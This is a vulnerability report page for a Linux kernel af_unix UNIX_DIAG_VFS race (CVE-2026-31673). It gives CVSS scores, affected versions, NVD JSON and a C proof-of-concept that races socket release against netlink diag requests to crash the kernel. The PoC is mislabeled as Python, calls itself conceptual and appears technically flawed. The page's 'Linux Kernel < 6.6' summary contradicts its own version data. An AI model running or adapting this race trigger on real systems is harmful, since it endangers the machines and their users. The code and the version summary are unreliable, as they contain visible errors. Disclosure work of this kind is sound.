Security Vulnerability Report
中文
CVE-2026-31673 CVSS 7.8 HIGH

CVE-2026-31673

Published: 2026-04-25 09:16:00
Last Modified: 2026-05-06 21:36:14
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: af_unix: read UNIX_DIAG_VFS data under unix_state_lock Exact UNIX diag lookups hold a reference to the socket, but not to u->path. Meanwhile, unix_release_sock() clears u->path under unix_state_lock() and drops the path reference after unlocking. Read the inode and device numbers for UNIX_DIAG_VFS while holding unix_state_lock(), then emit the netlink attribute after dropping the lock. This keeps the VFS data stable while the reply is being built.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (具体受影响版本需参考各发行版补丁公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-31673 (Conceptual) * This code attempts to trigger the race condition between * unix_release_sock and UNIX_DIAG_VFS parsing. * Compile: gcc -o poc_cve2026_31673 poc_cve2026_31673.c -lpthread */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <sys/un.h> #include <pthread.h> #include <linux/netlink.h> #include <linux/sock_diag.h> #include <linux/unix_diag.h> int sock_fd = -1; volatile int running = 1; // Thread 1: Continuously close and recreate the socket void *thread_close(void *arg) { struct sockaddr_un addr; while (running) { if (sock_fd != -1) { close(sock_fd); sock_fd = -1; } sock_fd = socket(AF_UNIX, SOCK_STREAM, 0); if (sock_fd < 0) continue; memset(&addr, 0, sizeof(addr)); addr.sun_family = AF_UNIX; bind(sock_fd, (struct sockaddr *)&addr, sizeof(addr)); usleep(100); // Tune timing to increase race window } return NULL; } // Thread 2: Send Netlink diagnostic requests void *thread_diag(void *arg) { int nl_sock; struct sockaddr_nl nl_addr; char buf[1024]; struct nlmsghdr *nlh; struct unix_diag_req *req; nl_sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG); if (nl_sock < 0) return NULL; memset(&nl_addr, 0, sizeof(nl_addr)); nl_addr.nl_family = AF_NETLINK; bind(nl_sock, (struct sockaddr *)&nl_addr, sizeof(nl_addr)); while (running) { if (sock_fd < 0) { usleep(100); continue; } memset(buf, 0, sizeof(buf)); nlh = (struct nlmsghdr *)buf; nlh->nlmsg_type = SOCK_DIAG_BY_FAMILY; nlh->nlmsg_flags = NLM_F_REQUEST; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct unix_diag_req)); req = (struct unix_diag_req *)NLMSG_DATA(nlh); req->sdiag_family = AF_UNIX; req->udiag_states = -1; // All states req->udiag_ino = 0; // Match any (or try to match specific) req->udiag_show = UDIAG_SHOW_VFS | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; sendto(nl_sock, buf, nlh->nlmsg_len, 0, (struct sockaddr *)&nl_addr, sizeof(nl_addr)); usleep(50); } close(nl_sock); return NULL; } int main() { pthread_t t1, t2; printf("[+] Starting PoC for CVE-2026-31673...\n"); pthread_create(&t1, NULL, thread_close, NULL); pthread_create(&t2, NULL, thread_diag, NULL); sleep(10); // Run for 10 seconds running = 0; pthread_join(t1, NULL); pthread_join(t2, NULL); if (sock_fd != -1) close(sock_fd); printf("[+] PoC finished. Check kernel logs for crashes.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31673", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-25T09:16:00.423", "lastModified": "2026-05-06T21:36:13.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: read UNIX_DIAG_VFS data under unix_state_lock\n\nExact UNIX diag lookups hold a reference to the socket, but not to\nu->path. Meanwhile, unix_release_sock() clears u->path under\nunix_state_lock() and drops the path reference after unlocking.\n\nRead the inode and device numbers for UNIX_DIAG_VFS while holding\nunix_state_lock(), then emit the netlink attribute after dropping the\nlock.\n\nThis keeps the VFS data stable while the reply is being built."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3", "versionEndExcluding": "6.6.136", "matchCriteriaId": "FAB12062-558C-4570-A908-D71195858ADA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0c739f3785f84af695952c2bac8be2f45082c9b8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/39897df386376912d561d4946499379effa1e7ef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/900a4e0910e98b8caef117d5df00471fa438dcf9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b9232421a77a649c9376c99fdfc8cb7f79cad34c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bdf206e740bf2919d818f132c8c9cc7ed91d11c0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.